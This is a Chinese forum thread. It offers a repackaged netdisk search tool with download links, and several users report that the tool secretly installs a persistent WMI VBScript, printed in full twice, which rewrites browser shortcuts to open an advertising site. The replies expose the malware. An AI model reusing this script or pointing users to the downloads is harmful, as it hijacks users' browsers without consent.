云搜网盘助手v1.7.16.0705单文件版

hongxj

这是根据最新云搜网盘助手v1.7.16.0705重新打包制作而成的单文件版，免安装，双击直接启动，退出自动删除。

云搜网盘助手（百度网盘资源提过器）是一款绿色万能的百度网盘搜索工具。软件功能强大，支持搜索百度网盘的资源和新浪微盘，可以进行磁力连接搜索和百度云直链解析，还可以登陆自己的百度云网盘去重复资源。

【云搜网盘助手功能特点】

1、支持对百度云的搜索：
可以一键验证链接是否有效，这个版本开始支持分类搜索了
可以直接下载、保存到自己的百度云盘（需登录），同时也可以生成二维码，方便手机访问
2、支持新浪微盘搜索：
3、支持磁力搜索，这个版本开始支持生成种子文件
4、支持百度云盘、360云盘、可乐云和千军万马网盘的直链解析，同样可以生成二维码
5、支持百度网盘去重功能（新增）：
索引成功后会按文件大小自动降序排列，本人亲测索引2W个文件耗时大概1分钟左右，所以速度还行。
同时支持对大文件的删除

云网盘搜索（2.25M)
http://pan.baidu.com/s/1i4UZ1el
https://yunpan.cn/c6V25mAAwuKjz （提取码：ebe1）

云网盘搜索（2.25M)

liiv

下载地址呢？

东写西读3457

垃圾，会在ie的快捷方式里改主页

东写西读3457

帖子链接：http://www.chinapyg.com/thread-85057-1-1.html举报人：帖子楼主。举报内容：楼主所发软件暗藏脚本为浏览器快捷方式添加广告小尾巴。1.火眼查毒 安装文件 “云搜网盘助手V1.0.0_1.exe” ：http://fireeye.ijinshan.com/analyse.html?md5=a577512c20c9b6723b023a11065d74b0&sha1=d7fbf627675a92d1b47e13d4a47a2670d03beb0e#key释放文件“SetHomePage.dll”：http://fireeye.ijinshan.com/analyse.html?md5=72f904ae3581cf599b38e8dbf0a13bb1&sha1=6492c0ef423cc0836a50694511006747193310df#full2.实测软件安装后，WMItool连接root\CIMV2 发现 _EventFilter.Name"VBScriptLive_filter", 查看ScriptTextScriptText 内容：On Error Resume Next:Const link = "http://hk.jtsh123.com/?r=y&m=1":Const link360 = "http://hk.jtsh123.com/?r=y&m=1&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:行为：查找浏览器为快捷方式添加小尾巴，因脚本并非即时运行，具有较强隐蔽性。望管理员明察。

东写西读3457

帖子链接：http://www.chinapyg.com/thread-85057-1-1.html举报人：帖子楼主。举报内容：楼主所发软件暗藏脚本为浏览器快捷方式添加广告小尾巴。1.火眼查毒 安装文件 “云搜网盘助手V1.0.0_1.exe” ：http://fireeye.ijinshan.com/analyse.html?md5=a577512c20c9b6723b023a11065d74b0&sha1=d7fbf627675a92d1b47e13d4a47a2670d03beb0e#key释放文件“SetHomePage.dll”：http://fireeye.ijinshan.com/analyse.html?md5=72f904ae3581cf599b38e8dbf0a13bb1&sha1=6492c0ef423cc0836a50694511006747193310df#full2.实测软件安装后，WMItool连接root\CIMV2 发现 _EventFilter.Name"VBScriptLive_filter", 查看ScriptTextScriptText 内容：On Error Resume Next:Const link = "http://hk.jtsh123.com/?r=y&m=1":Const link360 = "http://hk.jtsh123.com/?r=y&m=1&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:行为：查找浏览器为快捷方式添加小尾巴，因脚本并非即时运行，具有较强隐蔽性。望管理员明察。

东写西读3457

再次曝光这个软件的恶意行为，这是在谷歌上搜到的同是曝光这个软件的帖子htt  p://w ww.chinapyg.com/thread-85342-1-1.html，这个是注册的恶意文件SetHomePage.dll，还有火眼的分析结果h ttp://fireeye.ijinshan.com/analyse.html?md5=a577512c20c9b6723b023a11065d74b0&sha1=d7fbf627675a92d1b47e13d4a47a2670d03beb0e#key以及h ttp://fireeye.ijinshan.com/analyse.html?md5=72f904ae3581cf599b38e8dbf0a13bb1&sha1=6492c0ef423cc0836a50694511006747193310df#full

chonglouzisi

艹tm的  中招了！管理员来管管啊

hongxj

暂时并没发现有什么不良现象出现，浏览器主页也没见到被修改。
这类软件是很容易被杀毒软件报有病毒的，但不一定真有病毒，不过小心为好，随时关注它是否真有恶意行为。
在线查毒结果：扫描结果:5%的杀软(2/39)报告发现病毒
http://r.virscan.org/report/6f5641310fe54340bdd6bec2ff1e3cac

alex.sun

我也是看了楼猪发的绿色安全才下载用的，一用就中招了，而且这软件也不是楼猪说的那么好。我都不知道说什么好了。你知道吗：你坑的是爹。。。

chenlife

曝光这个软件的恶意行为

东写西读3457

chonglouzisi 发表于 2016-8-6 07:45
艹tm的  中招了！管理员来管管啊

我的回复已经够详细了你们还下载

chonglouzisi

东写西读3457 发表于 2016-8-20 18:59
我的回复已经够详细了你们还下载

关键是 没往下看 就下载了 中招后才回来看的。。。。。。。

hpxzh123

谢谢分享。

龚兵

怎样解决问题呢?我也中招了

hongxj

龚兵 发表于 2016-8-26 11:30
怎样解决问题呢?我也中招了

究竟中了什么招？请详细说明：修改主页了，系统无法启动了，IE无法浏览了，中毒了，音视频不正常了。。。。？？
东写西读3457 提到的恶意行为：查找浏览器为快捷方式添加小尾巴   我至今没能明白什么意思。